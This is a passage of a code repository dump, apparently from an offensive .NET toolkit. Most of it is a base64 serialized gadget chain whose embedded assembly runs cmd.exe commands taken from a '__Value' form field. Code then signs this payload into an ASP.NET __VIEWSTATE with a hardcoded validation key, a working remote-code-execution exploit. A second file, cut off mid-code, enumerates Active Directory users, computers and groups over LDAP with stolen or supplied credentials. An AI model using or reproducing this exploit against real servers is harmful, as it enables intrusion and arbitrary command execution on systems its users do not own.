AAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgCAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABgJwAAAAAAAEgAAAACAAUAdCEAALQFAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwBAAmAAAAAQAAEQJvAwAACgoWCysOBgcGB5MfeGHRnQcXWAsHBo5pMuwGcwQAAAoqAAAbMAMA0QAAAAIAABECKAUAAAooBgAACgoGbwcAAApvCAAACgZvCQAACm8KAAAKcwsAAAoLB28MAAAKcgEAAHBvDQAACgZvDgAACm8PAAAKchEAAHBvEAAACgwIKAEAAAYMB28MAAAKciEAAHAIKBEAAApvEgAACgdvDAAAChdvEwAACgdvDAAAChdvFAAACgdvDAAAChZvFQAACgdvFgAACiYHbxcAAApvGAAACg0JKAEAAAYNBm8JAAAKCW8ZAAAK3gMm3gAGbwkAAApvGgAACgZvCQAACm8bAAAKKgAAAAEQAAAAACIAlbcAAw4AAAFCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAADkAQAAI34AAFACAACEAgAAI1N0cmluZ3MAAAAA1AQAACwAAAAjVVMAAAUAABAAAAAjR1VJRAAAABAFAACkAAAAI0Jsb2IAAAAAAAAAAgAAAUcVAgAJAAAAAPolMwAWAAABAAAADgAAAAIAAAACAAAAAQAAABsAAAACAAAAAgAAAAEAAAADAAAAAAAKAAEAAAAAAAYAKQAiAAYAXAA8AAYAfAA8AAYAowAiAAoAwQC2AAoA2QC2AAoAAQG2AA4ANAEhAQ4APAEhAQoAaAG2AA4AnwGAAQYAMwIpAgYAUwIpAgYAeAIiAAAAAAABAAAAAAABAAEAAAAQABcAAAAFAAEAAQBQIAAAAACRADAACgABAIQgAAAAAIYYNAAPAAIAAAABADoAEQA0ABMAGQA0AA8AIQCqABgAIQA0AB0ACQA0AA8AKQDNADIAKQDrADcAMQD2AA8AKQAOATwAOQAbAQ8AQQA0AA8AQQBNAUEASQBbAUYAKQB0AUsAUQCzAVAAWQC8AVUAIQDFAVoASQDMAUYASQDaAWAASQD1AWAASQAPAmAAQQAjAmUAQQBAAmkAaQBeAm4AOQBoAkYAOQBuAg8AOQB0Ag8ALgALAHsALgATAIQAIwByAASAAAAAAAAAAAAAAAAAAAAAAJoAAAAEAAAAAAAAAAAAAAABABkAAAAAAAQAAAAAAAAAAAAAACkAtgAAAAAABAAAAAAAAAAAAAAAAQAiAAAAAAAAAAAAADxNb2R1bGU+ADNndjVrZHpwLmRsbABFAG1zY29ybGliAFN5c3RlbQBPYmplY3QAeG9yAC5jdG9yAHMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlADNndjVrZHpwAFN0cmluZwBUb0NoYXJBcnJheQBTeXN0ZW0uV2ViAEh0dHBDb250ZXh0AGdldF9DdXJyZW50AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAQ2xlYXJFcnJvcgBIdHRwUmVzcG9uc2UAZ2V0X1Jlc3BvbnNlAENsZWFyAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFByb2Nlc3NTdGFydEluZm8AZ2V0X1N0YXJ0SW5mbwBzZXRfRmlsZU5hbWUASHR0cFJlcXVlc3QAZ2V0X1JlcXVlc3QAU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkAE5hbWV
WYWx1ZUNvbGxlY3Rpb24AZ2V0X0Zvcm0AZ2V0X0l0ZW0AQ29uY2F0AHNldF9Bcmd1bWVudHMAc2V0X1JlZGlyZWN0U3RhbmRhcmRPdXRwdXQAc2V0X1JlZGlyZWN0U3RhbmRhcmRFcnJvcgBzZXRfVXNlU2hlbGxFeGVjdXRlAFN0YXJ0AFN5c3RlbS5JTwBTdHJlYW1SZWFkZXIAZ2V0X1N0YW5kYXJkT3V0cHV0AFRleHRSZWFkZXIAUmVhZFRvRW5kAFdyaXRlAEZsdXNoAEVuZABFeGNlcHRpb24AAAAAD2MAbQBkAC4AZQB4AGUAAA9fAF8AVgBhAGwAdQBlAAAHLwBjACAAAAAAAOrXDcNaTh9OoTl1+y/csJ0ACLd6XFYZNOCJBAABDg4DIAABBCABAQgEIAAdAwUgAQEdAwUHAh0DCAiwP19/EdUKOgQAABIVBCAAEhkEIAASHQQgABIlBCABAQ4EIAASKQQgABItBCABDg4FAAIODg4EIAEBAgMgAAIEIAASMQMgAA4IBwQSFRIhDg4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAFAnAAAAAAAAAAAAAG4nAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgJwAAAAAAAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAABMAgAAAAAAAAAAAABMAjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAAAAAAAAAAAAAAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAErAEAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAiAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADAALgAwAC4AMAAuADAAAAA8AA0AAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAADMAZwB2ADUAawBkAHoAcAAuAGQAbABsAAAAAAAoAAIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAAAgAAAARAANAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAADMAZwB2ADUAawBkAHoAcAAuAGQAbABsAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAAIA3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQPAAAAH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAABERhdGEJVW5pdHlUeXBlDEFzc2VtYmx5TmFtZQEAAQgGIQAAAP4BU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQnl0ZVtdLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAABiIAAABOU3lzdGVtLkNvcmUsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EBAAAAAHAAAACQMAAAAKCSQAAAAKCAgAAAAACggIAQAAAAERAAAADwAAAAYlAAAA9QJTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR
1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBIAAAAHAAAACQQAAAAKCSgAAAAKCAgAAAAACggIAQAAAAETAAAADwAAAAYpAAAA3wNTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAUAAAABwAAAAkFAAAACgksAAAACggIAAAAAAoICAEAAAABFQAAAA8AAAAGLQAAAOYCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAWAAAABwAAAAkGAAAACTAAAAAJMQAAAAoICAAAAAAKCAgBAAAAARcAAAAPAAAABjIAAADvAVN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBgAAAAHAAAACQcAAAAKCTUAAAAKCAgAAAAACggIAQAAAAEZAAAADwAAAAY2AAAAKVN5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuUGFnZWREYXRhU291cmNlBAAAAAY3AAAATVN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhEBoAAAAHAAAACQg
AAAAICAAAAAAICAoAAAAIAQAIAQAIAQAICAAAAAABGwAAAA8AAAAGOQAAAClTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkRlc2lnbmVyVmVyYgQAAAAGOgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EBwAAAAFAAAADQIJOwAAAAgIAwAAAAkLAAAAAR0AAAAPAAAABj0AAAA0U3lzdGVtLlJ1bnRpbWUuUmVtb3RpbmcuQ2hhbm5lbHMuQWdncmVnYXRlRGljdGlvbmFyeQQAAAAGPgAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQHgAAAAEAAAAJCQAAABAfAAAAAgAAAAkKAAAACQoAAAAQIAAAAAIAAAAGQQAAAAAJQQAAAAQkAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXICAAAACERlbGVnYXRlB21ldGhvZDADAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJQgAAAAlDAAAAASgAAAAkAAAACUQAAAAJRQAAAAEsAAAAJAAAAAlGAAAACUcAAAABMAAAACQAAAAJSAAAAAlJAAAAATEAAAAkAAAACUoAAAAJSwAAAAE1AAAAJAAAAAlMAAAACU0AAAABOwAAAAQAAAAJTgAAAAlPAAAABEIAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGUAAAANUBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGUgAAABpTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseQZTAAAABExvYWQKBEMAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCVMAAAAJPgAAAAlSAAAABlYAAAAnU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkgTG9hZChCeXRlW10pBlcAAAAuU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkgTG9hZChTeXN0ZW0uQnl0ZVtdKQgAAAAKAUQAAABCAAAABlgAAADMAlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2l
vbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAJUgAAAAZbAAAACEdldFR5cGVzCgFFAAAAQwAAAAlbAAAACT4AAAAJUgAAAAZeAAAAGFN5c3RlbS5UeXBlW10gR2V0VHlwZXMoKQZfAAAAGFN5c3RlbS5UeXBlW10gR2V0VHlwZXMoKQgAAAAKAUYAAABCAAAABmAAAAC2A1N5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABmIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZjAAAADUdldEVudW1lcmF0b3IKAUcAAABDAAAACWMAAAAJPgAAAAliAAAABmYAAABFU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtTeXN0ZW0uVHlwZV0gR2V0RW51bWVyYXRvcigpBmcAAACUAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSBHZXRFbnVtZXJhdG9yKCkIAAAACgFIAAAAQgAAAAZoAAAAwAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW4
9Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Cb29sZWFuLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABmoAAAAeU3lzdGVtLkNvbGxlY3Rpb25zLklFbnVtZXJhdG9yBmsAAAAITW92ZU5leHQKAUkAAABDAAAACWsAAAAJPgAAAAlqAAAABm4AAAASQm9vbGVhbiBNb3ZlTmV4dCgpBm8AAAAZU3lzdGVtLkJvb2xlYW4gTW92ZU5leHQoKQgAAAAKAUoAAABCAAAABnAAAAC9AlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGcgAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBnMAAAALZ2V0X0N1cnJlbnQKAUsAAABDAAAACXMAAAAJPgAAAAlyAAAABnYAAAAZU3lzdGVtLlR5cGUgZ2V0X0N1cnJlbnQoKQZ3AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkIAAAACgFMAAAAQgAAAAZ4AAAAxgFTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZ6AAAAEFN5c3RlbS5BY3RpdmF0b3IGewAAAA5DcmVhdGVJbnN0YW5jZQoBTQAAAEMAAAAJewAAAAk+AAAACXoAAAAGfgAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQZ/AAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpCAAAAAoBTgAAAA8AAAAGgAAAACZTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkNvbW1hbmRJRAQAAAAJOgAAABBPAAAAAgAAAAmCAAAACAgAIAAABIIAAAALU3lzdGVtLkd1aWQLAAAAAl9hAl9iAl9jAl9kAl9lAl9mAl9nAl9oAl9pAl9qAl9rAAAAAAAAAAAAAAAIBwcCAgICAgICAhMT0nTuKtERi/sAoMkPJvcLCw=="; 50 | 51 | Console.WriteLine(xaml_payload); 52 | Console.WriteLine("================"); 53 | byte[] 
payload = System.Convert.FromBase64String(xaml_payload); 54 | string data = CreateViewState(payload, "042A94E8", "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"); 55 | Console.WriteLine("__VIEWSTATE="); 56 | Console.WriteLine(data); 57 | } 58 | } 59 | } 60 | 61 | -------------------------------------------------------------------------------- /SharpADFindDemo.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.DirectoryServices; 6 | 7 | namespace SharpADFindDemo 8 | { 9 | class Program 10 | { 11 | static void ShowUsage() 12 | { 13 | string Usage = @" 14 | SharpADFindDemo 15 | Use to export the AD data by LDAP. 16 | Complie: 17 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll 18 | or 19 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll 20 | Usage: 21 | SharpADFindDemo 22 | command: 23 | - user 24 | - machine 25 | - group 26 | - ou 27 | - username 28 | - machinename 29 | - groupname 30 | - ouname 31 | Note:The maxsize is 1000. 32 | Eg: 33 | SharpADFindDemo.exe 192.168.1.1 test1 password1 user 34 | "; 35 | Console.WriteLine(Usage); 36 | } 37 | 38 | 39 | static void Main(string[] args) 40 | { 41 | if (args.Length != 4) 42 | { 43 | ShowUsage(); 44 | System.Environment.Exit(0); 45 | } 46 | try 47 | { 48 | string q = null; 49 | if (args[3] == "user" || args[3] == "username") 50 | q = "(&(objectCategory=person))"; 51 | else if(args[3] == "machine" || args[3] == "machinename") 52 | q = "(&(objectCategory=computer))"; 53 | else if(args[3] == "group" || args[3] == "groupname") 54 | q = "(&(objectCategory=group))"; 55 | else if(args[3] == "ou" || args[3] == "ouname") 56 | q = "(&(objectCategory=organizationalUnit))"; 57 | else 58 | { 59 | Console.WriteLine("[!] 
Wrong parameter"); 60 | System.Environment.Exit(0); 61 | } 62 | Console.WriteLine("[*] Querying LDAP://{0}", args[0]); 63 | Console.WriteLine("[*] Querying: {0}", q); 64 | DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0],args[1],args[2]); 65 | DirectorySearcher ds = new DirectorySearcher(de); 66 | ds.Filter = q; 67 | SearchResultCollection rs = ds.FindAll(); 68 | foreach (SearchResult r in rs) 69 | { 70 | if(args[3].Contains("name")) 71 | Console.WriteLine(r.GetDirectoryEntry().Name.ToString()); 72 | else 73 | { 74 | ResultPropertyCollection rprops = r.Properties; 75 | string prop = null; 76 | foreach (string name in rprops.PropertyNames) 77 | { 78 | foreach (object vl in rprops[name]) 79 | { 80 | prop = name + ":" + vl.ToString(); 81 | Console.WriteLine(prop); 82 | } 83 | } 84 | Console.WriteLine("-----"); 85 | } 86 | } 87 | Console.WriteLine("Total:"+rs.Count); 88 | } 89 | catch (Exception e) 90 | { 